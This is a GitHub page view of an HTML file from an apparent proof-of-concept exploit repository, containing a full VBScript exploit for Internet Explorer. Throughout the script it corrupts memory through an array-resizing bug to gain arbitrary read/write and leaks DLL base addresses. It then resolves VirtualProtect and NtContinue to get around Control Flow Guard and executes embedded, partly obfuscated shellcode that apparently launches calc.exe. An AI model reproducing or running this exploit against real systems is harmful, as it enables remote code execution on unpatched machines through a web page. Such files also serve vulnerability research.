forked from HacTF/poc--exp
-
Notifications
You must be signed in to change notification settings - Fork 0
/
beforeIE11.html
330 lines (296 loc) · 10.2 KB
/
beforeIE11.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
<!doctype html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="x-ua-compatible" content="IE=10">
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-control" content="no-cache">
<meta http-equiv="Cache" content="no-cache">
<script src="/cdn-cgi/apps/head/xGpmLMHiaqCy-agu1ud6fHqKiTo.js"></script></head>
<body>
<script type="text/vbscript">
Dim max_col
Dim index_vul
Dim index_a
Dim index_b
Dim addr
Dim array()
Dim array2(0,6)
Dim util_mem
Dim fake_array
Dim fake_str
Dim NtContinueAddr,VirtualProtectAddr
Class Dummy
End Class
Class MyClass
private Sub Class_Initialize
ReDim array(2)
IsEmpty(array)
End Sub
Public Default Property Get P
ReDim Preserve array(100000)
For i = 0 To UBound(array2,2)
array2(0,i) = 3
Next
For i = 0 To UBound(array)
array(i) = array2
Next
P=&h0fffffff
End Property
End Class
Function LeakVBAddr
Set dm = New Dummy
Set array(index_vul)(index_a+4,0) = dm
array(index_b)(0,4) = CDbl("6.36598737437801E-314")
LeakVBAddr=array(index_vul)(index_a+4,0)
End Function
Function GetBaseByDOSmodeSearch(ArrDll)
Dim TEMPVAL
TEMPVAL=ArrDll And &hffff0000
Do While GetUint32(TEMPVAL+(&h748+4239-&H176f))<>544106784 Or GetUint32(TEMPVAL+(&ha2a+7373-&H268b))<>542330692
TEMPVAL=TEMPVAL-65536
Loop
GetBaseByDOSmodeSearch=TEMPVAL
End Function
Function FND(lIII)
FND=GetUint32(lIII) And (&h17eb+1312-&H1c0c)
End Function
Function StrCompWrapper(lIII,lFNCl)
Dim ArrAI,INDEXTEMP
ArrAI=""
For INDEXTEMP=(&ha2a+726-&Hd00) To Len(lFNCl)-(&h2e1+5461-&H1835)
ArrAI=ArrAI &Chr(FND(lIII+INDEXTEMP))
Next
StrCompWrapper=StrComp(UCase(ArrAI),UCase(lFNCl))
End Function
Function GetBaseFromImport(base_address,name_input)
Dim import_rva,nt_header,descriptor,import_dir
Dim FNAI
nt_header=GetUint32(base_address+(&h3c))
import_rva=GetUint32(base_address+nt_header+&h80)
import_dir=base_address+import_rva
descriptor=0
Do While True
Dim Name
Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
If Name=0 Then
GetBaseFromImport=&hBAAD0000
Exit Function
Else
If StrCompWrapper(base_address+Name,name_input)=0 Then
Exit Do
End If
End If
descriptor=descriptor+1
Loop
FNAI=GetUint32(import_dir+descriptor*(&h14)+&h10)
GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+FNAI))
End Function
Function FNA(Domain)
lVARF=0
IVARCI=0
IVARFl=0
Id=CLng(Rnd*1000000)
lVARF=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99)
If(Id+lVARF)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then
lVARF=lVARF-(&h86d+6447-&H219b)
End If
IVARCI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255)
IVARFl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e)
FNA=Domain &"?" &Chr(IVARCI) &"=" &Id &"&" &Chr(IVARFl) &"=" &lVARF
End Function
Function FNB(ByVal FNCl)
IIll=""
For index=0 To Len(FNCl)-1
IIll=IIll &FNC(Asc(Mid(FNCl,index+1,1)),2)
Next
IIll=IIll &"00"
If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
IIll=IIll &"00"
End If
For INDEXTEMP=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
lArrB=Mid(IIll,INDEXTEMP*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
FNCll=Mid(IIll,INDEXTEMP*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
FNB=FNB &"%u" &FNCll &lArrB
Next
End Function
Function FNC(ByVal Number,ByVal Length)
IIII=Hex(Number)
If Len(IIII)<Length Then
IIII=String(Length-Len(IIII),"0") &IIII 'pad allign with zeros
Else
IIII=Right(IIII,Length)
End If
FNC=IIII
End Function
Function IReuseCLASS(lIII)
IReuseCLASS=GetUint32(lIII) And (131071-65536)
End Function
Function GetProcAddr(dll_base,name)
Dim p,export_dir,index
Dim function_rvas,function_names,function_ordin
Dim IVARCl
p=GetUint32(dll_base+&h3c)
p=GetUint32(dll_base+p+&h78)
export_dir=dll_base+p
function_rvas=dll_base+GetUint32(export_dir+&h1c)
function_names=dll_base+GetUint32(export_dir+&h20)
function_ordin=dll_base+GetUint32(export_dir+&h24)
index=0
Do While True
Dim lllI
lllI=GetUint32(function_names+index*4)
If StrCompWrapper(dll_base+lllI,name)=0 Then
Exit Do
End If
index=index+1
Loop
IVARCl=IReuseCLASS(function_ordin+index*2)
p=GetUint32(function_rvas+IVARCl*4)
GetProcAddr=dll_base+p
End Function
Function GetShellcode()
TEMPCODE=Unescape("%u0000%u0000%u0000%u0000") &Unescape("%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u652e%u6578%u4100%u0065%u0000%u0000%u0000%u0000%u0000%ucc00%ucccc%ucccc%ucccc%ucccc" &FNB(FNA("")))
TEMPCODE=TEMPCODE & String((&h80000-LenB(TEMPCODE))/2,Unescape("%u4141"))
GetShellcode=TEMPCODE
End Function
Function EscapeAddress(ByVal value)
Dim High,Low
High=FNC((value And &hffff0000)/&h10000,4)
Low=FNC(value And &hffff,4)
EscapeAddress=Unescape("%u" &Low &"%u" &High)
End Function
Function lArrDl
Dim INDEXTEMP,IlllI,TEMPCODE,VARFI,VARCI,llIII,lArrD
IlllI=FNC(NtContinueAddr,8)
VARFI=Mid(IlllI,1,2)
VARCI=Mid(IlllI,3,2)
llIII=Mid(IlllI,5,2)
lArrD=Mid(IlllI,7,2)
TEMPCODE=""
TEMPCODE=TEMPCODE &"%u0000%u" &lArrD &"00"
For INDEXTEMP=1 To 3
TEMPCODE=TEMPCODE &"%u" &VARCI &llIII
TEMPCODE=TEMPCODE &"%u" &lArrD &VARFI
Next
TEMPCODE=TEMPCODE &"%u" &VARCI &llIII
TEMPCODE=TEMPCODE &"%u00" &VARFI
lArrDl=Unescape(TEMPCODE)
End Function
Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) 'bypass cfg
Dim TEMPCODE
TEMPCODE=String((100334-65536),Unescape("%u4141"))
TEMPCODE=TEMPCODE &EscapeAddress(ShellcodeAddrParam)
TEMPCODE=TEMPCODE &EscapeAddress(ShellcodeAddrParam)
TEMPCODE=TEMPCODE &EscapeAddress(&h3000)
TEMPCODE=TEMPCODE &EscapeAddress(&h40)
TEMPCODE=TEMPCODE &EscapeAddress(ShellcodeAddrParam-8)
TEMPCODE=TEMPCODE &String(6,Unescape("%u4242"))
TEMPCODE=TEMPCODE &lArrDl()
TEMPCODE=TEMPCODE &String((&h80000-LenB(TEMPCODE))/2,Unescape("%u4141"))
WrapShellcodeWithNtContinueContext=TEMPCODE
End Function
Function ExpandWithVirtualProtect(VirtualProtectAddrFake)
Dim TEMPCODE
Dim VARClI
VARClI=VirtualProtectAddrFake+&h23
TEMPCODE=""
TEMPCODE=TEMPCODE &EscapeAddress(VARClI)
TEMPCODE=TEMPCODE &String((&hb8-LenB(TEMPCODE))/2,Unescape("%4141"))
TEMPCODE=TEMPCODE &EscapeAddress(VirtualProtectAddr)
TEMPCODE=TEMPCODE &EscapeAddress(&h1b)
TEMPCODE=TEMPCODE &EscapeAddress(0)
TEMPCODE=TEMPCODE &EscapeAddress(VirtualProtectAddrFake)
TEMPCODE=TEMPCODE &EscapeAddress(&h23)
TEMPCODE=TEMPCODE &String((&400-LenB(TEMPCODE))/2,Unescape("%u4343"))
ExpandWithVirtualProtect=TEMPCODE
End Function
Function SetMemValue(valkey)
array(index_vul)(index_a+2,0)(util_mem)=3
array(index_vul)(index_a+2,0)(util_mem+8) = valkey
End Function
Function GetMemValue
array(index_vul)(index_a+2,0)(util_mem)=3
GetMemValue=array(index_vul)(index_a+2,0)(util_mem+8)
End Function
Sub ExecuteShellcode
array(index_vul)(index_a+2,0)(util_mem)=&h4d
array(index_vul)(index_a+2,0)(util_mem+8)=0
msgbox(util_mem)
End Sub
Function rw_primit()
array(index_vul)(index_a+2,0)=fake_array
array(index_b)(0,2)=CDbl("1.74088534731324E-310")
array(index_vul)(index_a,0)=fake_str
array(index_b)(0,0)=CDbl("6.36598737437801E-314")
util_mem=array(index_vul)(index_a,0)
End Function
Function read
read=LenB(array(index_vul)(index_a+2,0)(util_mem+8))
End Function
Function GetUint32(addr)
Dim value
array(index_vul)(index_a+2,0)(util_mem+8)=addr +4
array(index_vul)(index_a+2,0)(util_mem)=8
value=read()
array(index_vul)(index_a+2,0)(util_mem)=3
GetUint32 = value
End Function
Set cls = New MyClass
array(2)=cls
IsEmpty(array)
max_col=&h0fffffff
For i=0 To UBound(array)
If UBound(array(i),1)-LBound(array(i),1)+1=max_col Then
index_vul=i
Exit For
End If
Next
For i=0 To UBound(array(index_vul),1)
Dim type1 ,type2 ,type3 ,type4
type1=VarType(array(index_vul)(i,0))
type2=VarType(array(index_vul)(i+1,0))
type3=VarType(array(index_vul)(i+3,0))
type4=VarType(array(index_vul)(i+4,0))
If(type1 = 2 And type2 = 2 And type3 = 3 And type4 = 3) Then
index_a=i+3
array(index_vul)(index_a,0)="AAAA"
Exit For
End If
Next
For i=0 To UBound(array,1)
If array(i)(0,0)=8 Then
index_b=i
Exit For
End If
next
fake_array=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
fake_str=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
rw_primit()
vb_adrr=LeakVBAddr()
'Alert "LeakVBAddr Base: 0x" & Hex(vb_adrr)
vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
'Alert "VBScript Base: 0x" & Hex(vbs_base)
msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
'Alert "MSVCRT Base: 0x" & Hex(msv_base)
krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
'Alert "KernelBase Base: 0x" & Hex(krb_base)
ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
'Alert "Ntdll Base: 0x" & Hex(ntd_base)
VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
'Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr)
NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
'Alert "KernelBase!VirtualProtect NtContinueAddr Address 0x" & Hex(NtContinueAddr)
SetMemValue GetShellcode()
ShellcodeAddr=GetMemValue()+8
'Alert "Shellcode Address 0x" & Hex(ShellcodeAddr)
SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
VirtualProtectAddrFake=GetMemValue()+69596
SetMemValue ExpandWithVirtualProtect(VirtualProtectAddrFake)
ReuseCLASSl=GetMemValue()
'Alert "Executing Shellcode"
ExecuteShellcode()
</script>
</body>
</html>